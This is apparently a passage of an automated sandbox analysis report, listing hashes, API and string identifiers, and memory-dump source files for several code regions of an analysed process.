                                                • Instruction ID: 52ac8385a680ecbe403796573538aa518863fdf831a7be2a5a181b45fffd0c08
                                                • Opcode Fuzzy Hash: fc528aed4783bade6eb938a378ecb8e4e2dc3f97fd9614eaeb347b6222dbe521
                                                • Instruction Fuzzy Hash: E2313875E01228AFCF15EFA8D844A9EBBF1FF48714F10412AE611B7290DB359905CF64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 5dbaba07d534f8086c74f6f64e04acf7dd0af31de449cc7d032e9ffa938f3936
                                                • Instruction ID: 4b7016bd6a4bf9ddb20e82c62ee1ff6de6676b015a468c8060fde4880861861d
                                                • Opcode Fuzzy Hash: 5dbaba07d534f8086c74f6f64e04acf7dd0af31de449cc7d032e9ffa938f3936
                                                • Instruction Fuzzy Hash: 46324774D04369DFEB21CF66C884BDDBBB4BB08308F9041E9D549A7281DB759A84CF92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 79b490d262216ce59a0d491a185820fe1f2e46ed44c719f18e14e599279f3990
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: 2191A47CE093169FEB10CF6AC8846AEB7B5EF84765F60451EE854E72C0EB308A40C761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                • Opcode ID: cf0c5b618a63242f185f48f432c995aab707abd300594f96bdbd5c0b342ca131
                                                • Instruction ID: 392b14da1ea7225b234b03383b9415f7d8e8b9709fe73c1a98e7ba22758ca554
                                                • Opcode Fuzzy Hash: cf0c5b618a63242f185f48f432c995aab707abd300594f96bdbd5c0b342ca131
                                                • Instruction Fuzzy Hash: 3451CFB9E10258CFEB14CF95C88469DFBF4EF84398F25802ED0499B251EB70D985CBA0
                                                APIs
                                                Strings
                                                • kLsE, xrefs: 36D60540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36D6063D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 3446177414-2547482624
                                                • Opcode ID: ca245e52c6e87e3af70fb01e4ce9937c5a968403edfa9eace86a16124b49072f
                                                • Instruction ID: 0b280f550c5bf67377e46d6289f745fb27360b098545b9e2d42586b6b5b0f73a
                                                • Opcode Fuzzy Hash: ca245e52c6e87e3af70fb01e4ce9937c5a968403edfa9eace86a16124b49072f
                                                • Instruction Fuzzy Hash: 5151E0B59147428FD314DFA6D6406A3B7E5AF84308F50883EE9EA87240E770D589CFE2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0$0
                                                • API String ID: 3446177414-203156872
                                                • Opcode ID: b6a7bcb4739bf5be1551fe70b0b0c7560bab7e563590fbbbeaf1c2d48e82aa3b
                                                • Instruction ID: 71ebce4e084fb728c3d7c468d71bd05a711b4727c1a0d575d41b16c1d4fca378
                                                • Opcode Fuzzy Hash: b6a7bcb4739bf5be1551fe70b0b0c7560bab7e563590fbbbeaf1c2d48e82aa3b
                                                • Instruction Fuzzy Hash: AC4180B1A087459FD700CF29C444A1ABBE4FF88358F05492EF588DB740D771E905CB96